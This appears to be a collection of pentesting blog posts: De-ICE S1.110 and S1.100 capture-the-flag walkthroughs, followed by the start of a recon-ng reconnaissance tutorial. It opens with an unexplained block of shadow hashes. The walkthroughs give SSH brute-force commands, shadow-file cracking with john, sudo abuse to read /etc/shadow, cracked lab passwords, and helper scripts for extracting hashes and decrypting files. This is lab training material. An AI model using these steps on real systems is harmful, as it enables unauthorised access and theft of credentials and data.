jalcantar:$1$dXJ/vdIf$1kaaAoMN7832vQ.0h8idE1:16442:0:99999:7:::
mholland:$1$HZL/.eIf$y0VAQHlJuHxJ09uHYYXYV1:16442:0:99999:7:::
mbryan:$1$/kN/3eIf$b6lCYJUAEVi89QU501i/J.:16442:0:99999:7:::
rjacobson:$1$WuP/8eIf$mbawyIozTk2s4rMW6.ruA/:16442:0:99999:7:::
ccoffee:$1$8.S/DeIf$1FJ.To3iEN0LVosO0Xtzg/:16442:0:99999:7:::
rpatel:$1$c8U/IeIf$g91rGG1w6ulFOgRto6R.D/:16442:0:99999:7:::
sjohnson:$1$zoW/NeIf$I6x4GbMkhjKDps9B56Yrm0:16442:0:99999:7:::
mnader:$1$u5Z/SeIf$9qy9RwXoat1fLfbQMjvri.:16442:0:99999:7:::
krenfro:$1$Hwb/XeIf$626PVcnIxjUS6zrwWz40P.:16442:0:99999:7:::

unshadow 120passwd 120shadow > 120unshadow
john -rules -wordlist=/usr/share/wordlists/rockyou.txt 120unshadow


De-ICE S1.110

Scenario: The scenario for this LiveCD is that a CEO of a small company has tasked you to do more extensive penetration testing of systems within his company. The network administrator has reconfigured systems within his network to meet tougher security requirements and expects you to fail any further penetration attempts. This system is an FTP server used by the network administrator team to create/reload systems on the company intranet. No classified or sensitive information should reside on this server. Through discussion with the administrator, you found out that this server had been used in the past to maintain customer information, but has been sanitized (as opposed to re-built). Prove to the network administrator that proper system configuration is not the only thing critical in securing a server.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso

Default IP 192.168.1.110

Flags:
1. create list of open ports
2. create list of users for brute force
3. brute force password for one or more users on an open service
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: obtain customer credit card information

 

Spoilers and Walkthrough

Change IP – Depending on your configuration you may not need to do this. Log in as root (the password is at the bottom of the page). This assumes that you are using VMware NAT and that XX is the third octet of the range you are using.

   ifconfig eth0 192.168.XX.110/24
   route add default gw 192.168.XX.2

Port Scan the System –

   nmap -sV -T4 -O -oX /root/Desktop/deice110 192.168.42.110

Hitting it with a version scan to determine what is running. We output the results as XML (-oX) so we can practise using the Metasploit database. You can do it all from inside msfconsole with the db_nmap command followed by the normal nmap switches, but I’m showing you the import function.

   msfconsole
   workspace -a deice
   workspace deice

This creates a workspace named deice in the Metasploit database and makes it the current one.

   db_import /root/Desktop/deice110
   hosts

You should see the 110 address. WooHoo!

   services

There should be four ports open. Go check out the website because it has info you need.
adamsa@herot.net
banterb@herot.net
coffeec@herot.net

I love me some FTP, I really love anonymous FTP

   use auxiliary/scanner/ftp/anonymous

Use either the command-line FTP client or FileZilla to get access.
I used FileZilla and downloaded everything.
download/etc/shadow seems promising.
John can work with a shadow file directly, without unshadowing it.

Running john against it:

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt shadow

john returned a password but it didn’t work.

There is a passwd file in download/opt/cygwin/etc but no shadow file, so moving along.
What is the core file in download/etc?

   file core
   core: ELF 32-bit LSB core file Intel 80386....

Better Google that: it is a Linux core dump file. Go read some on that, we’ll wait.

   strings core

The end looks like a dump of a shadow file

   strings core > /root/Desktop/deice/coredump

This gives us a working copy on the desktop. I copied out the shadow entries and split them at the usernames so each one sits on its own line. If you look at the shadow file from the 100 disk for the normal format: second verse, same as the first.

   john -rules -wordlist=/usr/share/wordlists/rockyou.txt coreshadow
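The splitting step above, done programmatically, as an added example that is not part of the original walkthrough: a regular expression for the nine-field shadow record pulls every entry out of a binary blob even when the records are jammed together with no newline between them, and writes the login:hash lines john reads. SAMPLE_CORE is a constructed blob with made-up md5crypt hashes, not the real De-ICE dump; the function and table names are this example’s own.

```python
"""Added example, not code from the walkthrough: cut /etc/shadow records out
of a core dump (or any binary blob) so john can read them.

`strings core` showed the shadow file at the tail of the S1.110 dump and the
author split the entries at the usernames by hand.  The regular expression
below does that automatically: it matches the nine-field shadow record (login,
hash, then seven numeric-or-empty ageing fields) wherever it occurs, including
records glued together with no newline between them.  SAMPLE_CORE is a
constructed blob with made-up md5crypt hashes, not the real De-ICE dump.
"""
import re
from typing import List, Tuple

# login : hash : lastchg : min : max : warn : inactive : expire : flag
SHADOW_RECORD = re.compile(
    rb"(?P<login>[a-z_][a-z0-9_-]{0,31}):"
    rb"(?P<hash>\$[156]\$[./0-9A-Za-z]+\$[./0-9A-Za-z]+"   # md5crypt / sha-crypt
    rb"|\*|!!?|)"                                          # locked or empty
    rb"(?::[0-9]*){7}"                                     # the seven ageing fields
)

JOHN_FORMATS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt"}

# Constructed stand-in for the core file: ELF magic, an unrelated string,
# three shadow records back to back with no separators, then junk.
SAMPLE_CORE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16
    + b"some unrelated string\x00"
    + b"root:$1$Xk3sT9pq$abcdefghijklmnopqrstuv:13553:0:::::"
    + b"bin:*:9797:0:::::"
    + b"bbanter:$1$Lm2wQz7r$0123456789ABCDEFGHIJKL:13550:0:99999:7:::"
    + b"\x00trailing junk"
)


def extract_shadow_records(blob: bytes) -> List[Tuple[str, str]]:
    """Every (login, hash) pair found in the blob, in order of appearance."""
    return [(m["login"].decode("ascii"), m["hash"].decode("ascii"))
            for m in SHADOW_RECORD.finditer(blob)]


def crackable(records):
    """Drop locked (*, !) and empty entries; there is nothing to crack there."""
    return [(login, h) for login, h in records if h.startswith("$")]


def john_format(h: str) -> str:
    """John's --format name for a crypt(3) hash, e.g. $1$... -> md5crypt."""
    return JOHN_FORMATS.get(h[:3], "unknown")


def john_lines(records) -> List[str]:
    """login:hash lines; john accepts these without the remaining fields."""
    return [f"{login}:{h}" for login, h in crackable(records)]


def dump_core_shadow(core_path: str, out_path: str) -> int:
    """Read a real core file and write the john input; returns record count."""
    with open(core_path, "rb") as fh:
        lines = john_lines(extract_shadow_records(fh.read()))
    with open(out_path, "w") as out:
        out.write("\n".join(lines) + ("\n" if lines else ""))
    return len(lines)


if __name__ == "__main__":
    for line in john_lines(extract_shadow_records(SAMPLE_CORE)):
        print(line, "->", john_format(line.split(":", 1)[1]))
```

dump_core_shadow("core", "coreshadow") produces the file the john command above expects; the regex is deliberately strict about the seven trailing fields so that passwd-style lines elsewhere in the dump are not mistaken for shadow records.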

That cracks two accounts, root and bbanter. SSH to the system as bbanter and su to root.

   ssh to the box as bbanter
   ssh bbanter@192.168.42.110
   su -

From the 100 disk we know that .enc files are encrypted and we are looking for credit card data so why not try to find that again.

   cd /
   find / -iname '*.enc' 2>/dev/null

That pukes back a lot of things but look at:

   /home/root/.save/customer_account.csv.enc

Jump back to the openssl decrypt from the 100 disk if you need help:

   openssl list-cipher-commands
   openssl enc -aes-128-cbc -d -in /home/root/.save/customer_account.csv.enc -out customer_account.csv

WAIT NO JOY!
Lets go look at the /home/root/.save folder

   cd /home/root/.save
   ls

Look at the copy.sh script

   cat copy.sh

This is the script that encrypted the file. Its -pass file: argument names the file holding the passphrase, and it used aes-256-cbc rather than the 128-bit cipher tried above. Let’s decrypt it now:

   openssl enc -d -aes-256-cbc -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
   cat customer_account.csv

BOOM you’re done. Openssl is a pain but now you’re a pro.

Account Information

root:Complexity
bbanter:Zymurgy

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture-the-flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHLAK still has the best Tux logo of any distro, RIP PHLAK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.

De-ICE S1.100

Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black-box test. Since I am running this in a local VMware environment, speed isn’t an issue, so -T5 it is. I also want to do OS detection and service enumeration, so I’m using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

To start out I always look for low-hanging fruit. Since the FTP service looks to be broken based on the Nmap results, we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Mary (marym@herot.net)
Pat Patrick (patrickp@herot.net)
Terry Thompson (thompsont@herot.net)
Ben Benedict (benedictb@herot.net)
Erin Gennieg (genniege@herot.net)
Paul Michael (michaelp@herot.net)
Ester Long (longe@herot.net)
Adam Adams (adamsa@herot.net)
Bob Banter (banterb@herot.net)
Chad Coffee (coffeec@herot.net)

This is where it helps to have either been a sysadmin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last> and <first initial><last>. I’ve also seen <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial>, we will use that alongside the two common conventions, and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee
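The list above, generated rather than typed, as an added example that is not part of the original walkthrough: it applies the conventions the text describes to the ten names, and it also checks which convention the site’s own e-mail addresses reveal, so the brute force can be narrowed to the one the admins actually use. The names are the ten from the page; the page-text snippet in the demo is constructed and the function names are this example’s own.

```python
"""Added example, not part of the original walkthrough: turn the names scraped
from the S1.100 contact page into the SSH user list, and check which naming
convention the site's own e-mail addresses reveal.  The conventions are the
ones the text uses (First.Last, <last><first initial> and <first initial><last>);
the snippet of page text is constructed.
"""
import re
from typing import Iterable, List, Optional, Tuple

# The ten names listed on the S1.100 web page.
HEROT_STAFF = [
    "Marie Mary", "Pat Patrick", "Terry Thompson", "Ben Benedict",
    "Erin Gennieg", "Paul Michael", "Ester Long", "Adam Adams",
    "Bob Banter", "Chad Coffee",
]

# Each convention maps (first, last), already lower-cased, to a username.
CONVENTIONS = {
    "first.last":   lambda f, l: f"{f}.{l}",
    "First.Last":   lambda f, l: f"{f.title()}.{l.title()}",   # as listed above
    "last+initial": lambda f, l: f"{l}{f[0]}",                 # herot.net mailbox style
    "initial+last": lambda f, l: f"{f[0]}{l}",
}


def split_name(full_name: str) -> Tuple[str, str]:
    """First and last token of a display name, lower-cased."""
    parts = full_name.strip().lower().split()
    if len(parts) < 2:
        raise ValueError(f"need at least two name parts: {full_name!r}")
    return parts[0], parts[-1]


def candidate_usernames(names: Iterable[str],
                        conventions: Optional[Iterable[str]] = None,
                        extra: Iterable[str] = ("root",)) -> List[str]:
    """Ordered, de-duplicated candidate list: `extra` first, then every
    selected convention applied to every name."""
    labels = list(conventions) if conventions is not None else list(CONVENTIONS)
    out: List[str] = []
    for candidate in list(extra) + [CONVENTIONS[label](*split_name(n))
                                     for n in names for label in labels]:
        if candidate not in out:
            out.append(candidate)
    return out


def usernames_from_emails(page_text: str) -> List[str]:
    """Mailbox names from any addresses in scraped text; these are the ground
    truth for the naming convention in use."""
    pattern = r"\b([a-z0-9._-]+)@[a-z0-9.-]+\.[a-z]{2,}\b"
    return sorted({m.group(1).lower() for m in re.finditer(pattern, page_text, re.I)})


def infer_conventions(samples: Iterable[Tuple[str, str]]) -> List[str]:
    """Labels of the conventions that reproduce every observed
    (display name, mailbox name) pair."""
    samples = list(samples)
    return [label for label, make in CONVENTIONS.items()
            if all(make(*split_name(name)).lower() == user.lower()
                   for name, user in samples)]


if __name__ == "__main__":
    # Constructed snippet standing in for the scraped contact page.
    snippet = ("Adam Adams adamsa@herot.net Bob Banter banterb@herot.net "
               "Chad Coffee coffeec@herot.net")
    print(usernames_from_emails(snippet))
    print(infer_conventions([("Adam Adams", "adamsa"), ("Bob Banter", "banterb")]))
    print("\n".join(candidate_usernames(HEROT_STAFF)))
```

With the three herot.net addresses as samples, infer_conventions returns only last+initial, and candidate_usernames(HEROT_STAFF, ["last+initial"]) is the eleven-name list that actually matches the box; the full list is what you feed USER_FILE when you have no such evidence.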

I’ll use Metasploit to do the initial check for weak SSH passwords. You can set your options differently; this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true
run

Look at that! There is nothing better than a shell, and you will never forget the first one you get. Mine was an unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now, so let’s see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet, since on Linux and Unix systems membership in wheel is what typically allows a user to run su (and it is often granted sudo rights as well). aadams is a member of the wheel group, so we will try to brute force that password, again using Metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can attack shadow files directly, so let’s try it using the rockyou wordlist. The first command runs single-crack mode, which builds guesses from the login name and GECOS fields and finds easy passwords like bbanter’s, so you don’t have to brute force that one again; the second runs the wordlist.

john --single de-iceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -

Now that we are root on the system, let’s look for sensitive data.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc. Google that; I bet salary information isn’t supposed to be there either way. Running strings definitely doesn’t produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

But try googling Salted__ and see if you can figure out what we might need to do. Those eight bytes are the magic that openssl enc writes at the start of anything it encrypts with a passphrase, followed by an 8-byte salt and then the ciphertext, so this is an OpenSSL-encrypted file. Now remember the /etc/passwd comment that changing the root password would break the FTP encryption: the root password is the passphrase. One caveat if you are following along with a current OpenSSL: since 1.1.0, enc derives the key with SHA-256 by default, while this file was made under the old MD5 default, so add -md md5 to the command below or you will get a bad decrypt error.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10
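What openssl is doing with that header and the passphrase, as an added example that is not part of the original walkthrough: a parser for the Salted__ layout and an implementation of EVP_BytesToKey, the key-derivation step that turns the passphrase and salt into the AES key and IV, with the digest selectable so the old MD5 behaviour and the post-1.1.0 SHA-256 behaviour can both be reproduced. SAMPLE_BLOB is constructed (its body is not real ciphertext), the function names are this example’s own, and the in-process AES decrypt needs the third-party cryptography package, so it is optional.

```python
"""Added example, not from the walkthrough: what the Salted__ header is and how
openssl enc derives the AES key and IV from the passphrase.

A file written by `openssl enc -<cipher>` with a passphrase begins with the
8-byte magic b"Salted__", then an 8-byte random salt, then the ciphertext
(PKCS#7 padded for CBC).  Key and IV come from EVP_BytesToKey:
D_1 = H(pass || salt), D_i = H(D_{i-1} || pass || salt), concatenated until
key_len + iv_len bytes exist.  H was MD5 up to OpenSSL 1.0.2 and is SHA-256
from 1.1.0 on, which is why a 2006-era file needs -md md5 with a modern
openssl.  SAMPLE_BLOB is constructed; only its header is meaningful.
"""
import hashlib
from typing import Dict, Tuple

MAGIC = b"Salted__"

# Constructed header + dummy body, only for exercising the parser.
SAMPLE_BLOB = MAGIC + bytes(range(1, 9)) + b"\xaa" * 16


def parse_salted(blob: bytes) -> Tuple[bytes, bytes]:
    """Split an openssl enc file into (salt, ciphertext)."""
    if not blob.startswith(MAGIC) or len(blob) < 16:
        raise ValueError("not an OpenSSL 'Salted__' file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int, iv_len: int,
                     md: str = "md5", count: int = 1) -> Tuple[bytes, bytes]:
    """OpenSSL's EVP_BytesToKey: iterate H over (D_{i-1} || pass || salt)."""
    material = b""
    prev = b""
    while len(material) < key_len + iv_len:
        d = prev + password + salt
        for _ in range(count):
            d = hashlib.new(md, d).digest()
        prev = d
        material += d
    return material[:key_len], material[key_len:key_len + iv_len]


def enc_parameters(blob: bytes, password: bytes, key_len: int = 16,
                   md: str = "md5") -> Dict[str, str]:
    """Salt, key and IV (hex) that `openssl enc -d -md <md>` would use."""
    salt, _ = parse_salted(blob)
    key, iv = evp_bytes_to_key(password, salt, key_len, 16, md)
    return {"salt": salt.hex(), "key": key.hex(), "iv": iv.hex(), "md": md}


def decrypt_aes_cbc(blob: bytes, password: bytes, key_len: int = 16,
                    md: str = "md5") -> bytes:
    """Full decrypt, equivalent to `openssl enc -d -aes-<bits>-cbc -md <md>`.
    Needs the `cryptography` package; otherwise fall back to the CLI."""
    try:
        from cryptography.hazmat.primitives import padding
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError as exc:
        raise RuntimeError("install 'cryptography', or run: openssl enc -d "
                           f"-aes-{key_len * 8}-cbc -md {md} -in FILE") from exc
    salt, ciphertext = parse_salted(blob)
    key, iv = evp_bytes_to_key(password, salt, key_len, 16, md)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


if __name__ == "__main__":
    # root's password from the shadow file is the passphrase for this box.
    for digest in ("md5", "sha256"):
        print(enc_parameters(SAMPLE_BLOB, b"tarot", 16, digest))
```

Running the main block shows that the same passphrase and salt give two different key/IV pairs depending on the digest, which is exactly why a modern openssl without -md md5 reports bad decrypt on this file rather than a wrong password.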

That is certainly sensitive data! We’ve got all the flags, time to call it a day.

 

Creating a Workspace

The workspace is an area that helps keep your reconnaissance organized. Each workspace has its own directory inside the hidden .recon-ng directory in your home directory.

First we will find an organization to recon and build our workspace around that company. We will use HackerOne to pick the company.

This is how Wikipedia describes HackerOne:

“HackerOne is a vulnerability coordination and bug bounty platform that connects businesses with cybersecurity researchers (aka, hackers). It is one of the first companies to embrace and utilize crowd-sourced security and hackers as linchpins of its business model, and is the largest cybersecurity firm of its kind.[1]”

Even though we are only performing reconnaissance in a non-intrusive manner, we will use a company from HackerOne’s directory, which has agreed to recon and scanning under the conditions it publishes. We will only be using recon-ng. Figure 1 shows the company we will use in the tutorial, but feel free to select a different company from HackerOne or any one that you are authorized to test against.


Figure 1: HackerOne Company

Figures 2 and 3 show the scope that is authorized for testing including eligible submissions and domains.


Figure 2: Eligible Items


Figure 3: Allowed Domains

workspaces -h shows us the different options we have available (Figure 4).

Figure 4: Workspace -h

Next we will add our workspace using the following command (Figure 5)

workspaces add

Figure 5: Adding a Workspace

After this command you are automatically placed into your new workspace. workspaces list will show you the status of your workspaces (Figure 6).

Figure 6: List of workspaces

Next, we will add our company and our domain. This adds information to the SQLite database, so we need to understand the schema, the layout of its tables. To look at the schema of the database, run the following command (Figure 7).

show schema

Figure 7: Show Schema

There are thirteen different tables; we will view the schema only of the tables used in this tutorial.

add companies

Running the add companies command prompts for the remaining columns. Press enter if you want to leave a column blank (Figure 8).

Figure 8: Add Company

Add the domain using the following command (Figure 9).

add domains

Figure 9: Add Domains

To verify that the domain was added successfully, run the command shown in Figure 10.

show domains

Figure 10: List Domains

A simple way of thinking about adding to the tables is shown in Figure 11.

Figure 11: Table Visualization

Now that we’ve added data to the database and know how to verify that manually inserted data is correct, let’s move on to importing and exporting data.

Importing Data into the Database

We will use theHarvester to gather information about united.com and import it into recon-ng’s database.

From Edge Security, http://www.edge-security.com/theharvester.php:

“The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tool is intended to help Penetration Testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.”

If theHarvester isn’t already installed, i.e. you aren’t using Kali Linux, you can clone it from here: https://github.com/laramies/theHarvester

Figure 12: theHarvester

We called theHarvester to gather data on the domain united.com using all the data sources listed in the help screen. We directed the output to our recon-ng folder using the ‘>’ operator. The sample command we used follows:

./theHarvester.py -d united.com -b all > ~/recon-ng/harvester.txt

The file name is harvester.txt. This is an ugly file that we will parse through using a few Linux utilities. Sample results are shown in Figure 13.

Figure 13: Sample Results

The next step is to take this output and clean it up a bit with some Linux utilities. We will use grep and AWK to trim the tree.

Grep and AWK

grep is a command-line utility for searching plain-text data sets for lines matching a regular expression.

This is by no means the perfect way; it is just one of many ways to get the results you need. Using grep, we will create a list of email addresses from the harvester.txt file (Figure 14).

grep @united.com harvester.txt > united_emails.txt

Figure 14: grep command

If you are interested in the file contents, use the cat command to view them in the terminal (Figure 15).

cat united_emails.txt

Figure 15: cat results

Next, we will create a list of hosts for import from theHarvester results (Figure 16).

grep ":" harvester.txt

Figure 16: grep host

Grep will also help create the virtual host list.  Also take note that since “united.com” is the only domain in scope, it becomes part of the command.

grep ":" harvester.txt | grep united.com

Figure 17: grep for Virtual Hosts

This command was a little harder to figure out. The pattern we wanted to match was “=”, and I didn’t want to count exactly how many lines follow it, so I used -A200 to print up to 200 lines after the match (Figure 17).

grep -A200 "=" harvester.txt | grep united.com > virtual_hosts.txt
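The same three extractions done in Python rather than grep, as an added example that is not part of the original post or of theHarvester. It assumes a constructed harvester.txt layout (email lines, "ip:host" lines, a virtual-host block under a ruler of "=") and, unlike the plain grep for united.com, rejects look-alike domains that merely contain the string.

```python
"""Turn raw theHarvester output into clean one-value-per-line lists for
recon-ng's import/list module. Added example, not code from the original
post or from theHarvester. SAMPLE_OUTPUT is constructed to mirror what the
post greps for; the real tool's layout may differ."""
import re
from pathlib import Path

SCOPE_DOMAIN = "united.com"  # the only domain in scope for the post

SAMPLE_OUTPUT = """\
[-] Emails found:
----------------
Jane.Doe@united.com
bob@united.com
bob@united.com
spam@notunited.com
[-] Hosts found in search engines:
----------------------------------
203.0.113.10:www.united.com
203.0.113.11:mail.united.com
198.51.100.5:partner.example.net
[-] Virtual hosts:
==================
203.0.113.10\tunited.com
203.0.113.10\tcareers.united.com
198.51.100.5\tshared.example.net
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def in_scope(name: str) -> bool:
    """Exact scope domain or a subdomain of it. A plain 'grep united.com'
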